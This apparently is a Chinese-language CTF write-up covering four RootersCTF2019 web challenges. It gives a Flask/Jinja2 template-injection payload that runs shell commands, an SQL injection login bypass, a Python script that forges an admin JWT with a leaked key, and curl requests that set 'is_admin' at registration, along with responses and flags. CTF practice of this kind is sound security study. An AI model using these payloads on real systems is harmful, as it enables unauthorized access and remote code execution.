友情提示:本文最后更新于 435 天前,文中的内容可能已有所发展或发生改变。 [RootersCTF2019]I_<3_Flask 这个直接秒吧?
1
2
3
?name={{cycler.next.__globals__.__builtins__.__import__('os').popen('ls /').read()}}
?name={{cycler.next.__globals__.__builtins__.__import__('os').popen('tac f*').read()}}
[RootersCTF2019]babyWeb 一看就是一个SQL注入,但是禁用了一些关键词,
1
union sleep or benchmark ' " -
直接先试试万能密码
1
?search=1||1=1 limit 0,1
就直接出了
[RootersCTF2019]ImgXweb 进来就感觉是个flask,观察一下
注册登录之后发现web服务是openresty,搜了一下是nginx的改良版
那就有可能是.user.ini
再找找发现cookie是个jwt,那么应该是要伪造admin
我直接修改发现还是不行,那估计要密钥了,很抽象的就是错了就得刷靶机,这个很烦我
访问/robots.txt
1
2
User-agent: *
Disallow: /static/secretkey.txt
我是直接写了个脚本修改
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import jwt
# 假设你已有一个 JWT 和对应的密钥
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYmFvem9uZ3dpIn0.ZzQ4oPWgTW39-7tZ90PoG3mQa29MqvMEMDY7pPfYCdE"
secret_key = "you-will-never-guess"
# 1. 解码 JWT,获取有效载荷
try :
decoded_payload = jwt . decode ( token , secret_key , algorithms = [ "HS256" ])
print ( "原始有效载荷:" , decoded_payload )
except jwt . ExpiredSignatureError :
print ( "JWT 已过期" )
except jwt . InvalidTokenError :
print ( "无效的 JWT" )
# 2. 修改有效载荷,例如修改 "user" 的值
decoded_payload [ 'user' ] = 'admin'
# 3. 重新生成带签名的 JWT
new_token = jwt . encode ( decoded_payload , secret_key , algorithm = "HS256" )
print ( "新的 JWT:" , new_token )
外带即可,看到flag路径了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
curl -i http://7b5ae377-b339-4de6-851a-521be4e9b5c5.node5.buuoj.cn/static/128e8ea7ce4a37b7100fb40b28c01280/flag.png
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 15 Sep 2024 07:13:06 GMT
Content-Type: image/png
Content-Length: 43
Connection: keep-alive
Last-Modified: Sun, 15 Sep 2024 03:05:27 GMT
Cache-Control: max-age=60
Expires: Sun, 15 Sep 2024 07:14:06 GMT
ETag: "1726369527.6339328-43-1735594767"
X-Cache: HIT
X-Cache: EXPIRED
Accept-Ranges: bytes
flag{43436fdb-7c97-4b3d-8c44-4fdc1872835d}
但是貌似flag不是动态的交不上,开了几次靶机也不行
[RootersCTF2019]notifyxapi 一进来就看到一坨的curl,不知道能干嘛执行看看
1
2
3
curl -X POST "http://4f19e16d-9cc2-489d-a152-292d99a9c223.node5.buuoj.cn:81/api/v1/register/" -H "Content-Type: application/json" -d '{"email": "bao@test.com", "password": "password"}'
{"created_user":{"id":3,"user":{"id":3,"email":"bao@test.com","is_admin":false},"authentication_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MjYzODQ5NDAsIm5iZiI6MTcyNjM4NDk0MCwianRpIjoiNTc4OTA1OGYtOGNjMC00NDU1LThkYmEtNTAyMmQ0YTU0MzUwIiwiZXhwIjoxNzU3OTIwOTQwLCJpZGVudGl0eSI6MywiZnJlc2giOmZhbHNlLCJ0eXBlIjoiYWNjZXNzIn0.PpOhNIf06H-IEohJwl4KeZyxEdyCjpACE6WZvL21gQQ"}}
估计是要伪造is_admin为真
1
2
3
curl -X POST "http://4f19e16d-9cc2-489d-a152-292d99a9c223.node5.buuoj.cn:81/api/v1/login/" -H "Content-Type: application/json" -d '{"email": "bao@test.com", "password": "password","is_admin":true}'
{"id":{"id":3,"email":"bao@test.com","is_admin":false},"authentication_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MjYzODUwMzMsIm5iZiI6MTcyNjM4NTAzMywianRpIjoiMzUwZDk1MWUtNTUyMi00YmUxLWFkYTgtNjI0YzMyNjNlMTMzIiwiZXhwIjoxNzU3OTIxMDMzLCJpZGVudGl0eSI6MywiZnJlc2giOmZhbHNlLCJ0eXBlIjoiYWNjZXNzIn0.XuCxDv8DVg8epXkKoMlx4hVXAENRw4VFEE_TELzGYFY"}
这里一直伪造不成功,后面我想了想是不是应该在注册页面伪造呢
1
2
3
4
curl -X POST "http://4f19e16d-9cc2-489d-a152-292d99a9c223.node5.buuoj.cn:81/api/v1/register/" -H "Content-Type: application/json" -d '{"email": "bao@test.com", "password": "password","is_admin":true}'
成功了
{"created_user":{"id":3,"user":{"id":3,"is_admin":true,"email":"bao@test.com"},"authentication_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MjYzODYwOTIsIm5iZiI6MTcyNjM4NjA5MiwianRpIjoiYmU4MDMyNTgtNGM4OS00YzNkLTllZjAtZjc1NWQ1YzlkYTViIiwiZXhwIjoxNzU3OTIyMDkyLCJpZGVudGl0eSI6MywiZnJlc2giOmZhbHNlLCJ0eXBlIjoiYWNjZXNzIn0.TTO52mMhVJQIJkF9lxTNObU85c18HzjNn0V7Va2nZt4"}}
那么登录
1
2
3
curl -X POST "http://4f19e16d-9cc2-489d-a152-292d99a9c223.node5.buuoj.cn:81/api/v1/login/" -H "Content-Type: application/json" -d '{"email": "bao@test.com", "password": "password"}'
{"id":{"id":3,"is_admin":true,"email":"bao@test.com"},"authentication_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MjYzODYxMzksIm5iZiI6MTcyNjM4NjEzOSwianRpIjoiM2NkZmJkZTctZTUxYS00ZmQxLWFjZWItNGQ4ZjFjODMwNWRlIiwiZXhwIjoxNzU3OTIyMTM5LCJpZGVudGl0eSI6MywiZnJlc2giOmZhbHNlLCJ0eXBlIjoiYWNjZXNzIn0.CxS2oT1WimWW0Mnrgzz9kwOAAFxJPaQbIbv_X8T_Ubc"}
正常操作即可
1
2
3
4
5
export ACCESS = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MjYzODYxMzksIm5iZiI6MTcyNjM4NjEzOSwianRpIjoiM2NkZmJkZTctZTUxYS00ZmQxLWFjZWItNGQ4ZjFjODMwNWRlIiwiZXhwIjoxNzU3OTIyMTM5LCJpZGVudGl0eSI6MywiZnJlc2giOmZhbHNlLCJ0eXBlIjoiYWNjZXNzIn0.CxS2oT1WimWW0Mnrgzz9kwOAAFxJPaQbIbv_X8T_Ubc"
curl - H "Authorization: Bearer $ACCESS" - H "Content-Type: application/json" "http://4f19e16d-9cc2-489d-a152-292d99a9c223.node5.buuoj.cn:81/api/v1/notifications/"
[{ "body" : "rooters{a_big_hard_business_in_a_big_hard_building}ctf" , "id" : 1 , "issuer" :{ "id" : 1 , "email" : "admin@test.com" }, "title" : "flag" },{ "body" : "hey, rosssssss" , "id" : 2 , "issuer" :{ "id" : 2 , "email" : "test@test.com" }, "title" : "The IT Crowd" },{ "body" : "Jen Barber? Is that the internet?" , "id" : 3 , "issuer" :{ "id" : 2 , "email" : "test@test.com" }, "title" : "The IT Crowd" },{ "body" : "flag{ca26edd8-d6c0-411a-be31-ad75ed97da07}" , "id" : 1 , "issuer" :{ "id" : 1 , "email" : "admin@test.com" }, "title" : "flag" }]
成功打出flag